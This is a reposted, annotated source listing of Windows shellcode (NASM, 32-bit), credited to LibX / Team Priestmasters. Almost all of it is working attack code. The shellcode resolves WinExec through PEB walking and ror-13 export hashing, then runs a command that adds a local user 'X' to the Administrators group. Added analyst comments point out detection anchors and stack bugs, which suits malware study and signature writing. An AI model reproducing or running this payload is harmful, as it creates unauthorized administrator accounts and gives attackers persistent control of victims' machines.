文章作者: LibX / Team Priestmasters (www.priestmaster.org)
代码:
; Generic Command Execution Shellcode v2.0
; Coded by LibX / Team Priestmasters (www.priestmaster.org)
;
; Analyst notes (NASM syntax, 32-bit Windows, position-independent):
;   * Layout: `call Start` is immediately followed by the command string, so
;     the pushed return address IS the string pointer (`pop ebx` in Start).
;   * kernel32 is located by walking the PEB loader list (fs:[30h]) and the
;     two imports are resolved by hashing export names with a ror-13/add loop
;     (GetProcAddress below) rather than by name -- both are classic shellcode
;     traits and good anchors for a detection rule.
;   * The payload is a plaintext "cmd.exe /c net user ... /add" string: it is
;     visible to static string scanning and, at run time, to process-creation
;     / command-line logging of the spawned cmd.exe child.
[BITS 32]
call Start                              ; pushes the address of CMD (the next byte) as "return address"
CMD: db "cmd.exe /c net user X X /add && net localgroup Administrators /add X", 0
WinExec equ 0x0e8afe98                  ; expected ror-13/add hash of the export name "WinExec" (see ComputeHash)
ExitProcess equ 0x73e2d87e              ; expected ror-13/add hash of the export name "ExitProcess"
Start:
pop ebx                                 ; ebx = &CMD (the return address pushed by `call Start`)
mov ebp, esp                            ; ebp = frame base; [ebp-4] caches the kernel32 base below
sub esp, 64                             ; reserve scratch space under the frame
mov eax, esp
xor al, al                              ; clear the low 8 bits: rounds esp DOWN to a 256-byte boundary
mov esp, eax                            ; (stronger than 16-byte alignment; may lower esp by up to 255 more bytes)
; Get kernel base address function
; --------------------
; Walks TEB -> PEB (fs:[30h]) -> PEB_LDR_DATA -> InInitializationOrderModuleList
; and takes the DllBase of the SECOND entry.
; NOTE(review): this assumes kernel32.dll is second in initialisation order,
; which is reportedly true on the XP-era systems this was written for but not
; on later Windows versions -- a useful triage/dating hint when analysing it.
mov eax, [fs:30h] ; eax = PEB (TEB+30h on 32-bit Windows)
mov eax, [eax+0ch] ; eax = PEB->Ldr (PEB_LDR_DATA)
mov esi, [eax+1ch] ; esi = Ldr->InInitializationOrderModuleList.Flink (first entry)
lodsd ; eax = first_entry->Flink, i.e. the SECOND entry (assumes DF is clear; cld only runs later in GetProcAddress)
mov edx, [eax+08h] ; edx = that entry's DllBase (the original comment said eax; the destination is edx)
mov dword [ebp-4], edx ; cache the module base at [ebp-4]; both GetProcAddress call sites read it from here
; --------------------
; WinExec function
; --------------------
push eax ; save eax value
push esi ; save esi value
push dword WinExec ; GetProcAddress arg 2: export-name hash
push dword [ebp-4] ; GetProcAddress arg 1: module base
call GetProcAddress ; eax = resolved export VA (eax is left UNCHANGED if no name matched, so a failed lookup is not detected)
; NOTE(review): GetProcAddress returns with a plain `ret`, so its two
; arguments are still on the stack from here on -- see the pops below.
xor esi, esi ; zero esi
inc esi ; esi = 1 (SW_SHOWNORMAL)
push esi ; WinExec arg 2: uCmdShow
push ebx ; WinExec arg 1: lpCmdLine = CMD
call eax ; WinExec(CMD, 1); stdcall, so the callee removes its own two args
pop esi ; meant to restore esi, but actually pops the module base left behind by GetProcAddress
pop eax ; meant to restore eax, but actually pops the WinExec hash; harmless, neither value is used again
; --------------------
call Exit ; execution simply falls into Exit; the pushed return address is dead stack data
Exit:
; ExitProcess function (no need to save register values :P)
; --------------------
push dword ExitProcess ; GetProcAddress arg 2: export-name hash
push dword [ebp-4] ; GetProcAddress arg 1: module base (cached above)
call GetProcAddress ; eax = resolved export VA (same no-match caveat as above)
xor esi, esi ; zero esi
push esi ; ExitProcess arg 1: uExitCode = 0
call eax ; ExitProcess(0) -- does not return
; --------------------
GetProcAddress:
;-----------------------------------------------------------------------
; eax = GetProcAddress(base, hash)   -- hash-based export lookup
; In (stack, as seen after pushad):
;   [esp+24h] = base : module base address
;   [esp+28h] = hash : ror-13/add hash of the export name (see ComputeHash)
; Out:   eax = VA of the matching export, delivered by overwriting eax's
;        pushad slot at [esp+1ch]. If NO name matches, that slot is never
;        written and eax returns unchanged -- callers cannot tell.
; Clobb: none (everything else restored by popad). Returns with a plain
;        `ret`, so the two arguments remain on the caller's stack.
; Offsets are the PE IMAGE_EXPORT_DIRECTORY layout; forwarded exports (an
; RVA that points back into the export directory) are not handled.
;-----------------------------------------------------------------------
pushad ; Save all registers (8 dwords = 20h bytes; return address now at [esp+20h])
mov ebp, [esp+24h] ; ebp = module base (the original comment said eax; the destination is ebp)
mov eax, [ebp+3ch] ; e_lfanew: RVA of the PE header
mov edx, [ebp+eax+78h] ; DataDirectory[EXPORT].VirtualAddress (RVA of the export directory)
add edx, ebp ; edx = export directory VA
mov ecx, [edx+18h] ; ecx = NumberOfNames
mov ebx, [edx+20h] ; AddressOfNames (RVA)
add ebx, ebp ; ebx = AddressOfNames VA
FindFunction:
; Loop invariant: ecx = number of names not yet examined; names are walked
; from the last index down to 0.
jecxz Finished ; no names left -> return without touching the eax slot
dec ecx ; ecx = index of the name examined in this iteration
mov esi, [ebx+ecx*4] ; RVA of that name
add esi, ebp ; esi = name VA (NUL-terminated ASCII)
ComputeHash:
xor edi, edi ; edi = hash accumulator
xor eax, eax ; keep eax's upper bytes zero so lodsb's al is the whole addend below
cld ; lodsb must walk forwards
ComputeHashAgain:
lodsb ; al = *esi++
test al, al ; Test ourselves.
jz ComputeHashDone ; NUL terminator reached
ror edi, 0dh ; hash = ror(hash, 13) + byte   (the well-known ror-13 export hash)
add edi, eax ; Add the new byte to the accumulator
jmp ComputeHashAgain ; Next iteration
ComputeHashDone:
Compare:
cmp edi, [esp+28h] ; compare against the requested hash (arg 2)
jnz FindFunction ; No match, try the next one.
mov ebx, [edx+24h] ; AddressOfNameOrdinals (RVA)
add ebx, ebp ; ebx = AddressOfNameOrdinals VA
; 16-bit load below: bits 16..31 of ecx keep the loop counter's upper half,
; so using ecx as an index afterwards assumes NumberOfNames < 65536.
mov cx, [ebx+2*ecx] ; cx = ordinal for name index ecx
mov ebx, [edx+1ch] ; AddressOfFunctions (RVA)
add ebx, ebp ; ebx = AddressOfFunctions VA
mov eax, [ebx+4*ecx] ; function RVA, indexed by ordinal
add eax, ebp ; function VA
mov [esp+1ch], eax ; eax's pushad slot -> becomes the return value after popad
Finished:
popad ; Restore all registers (eax picks up the value stored at [esp+1ch], if any)
ret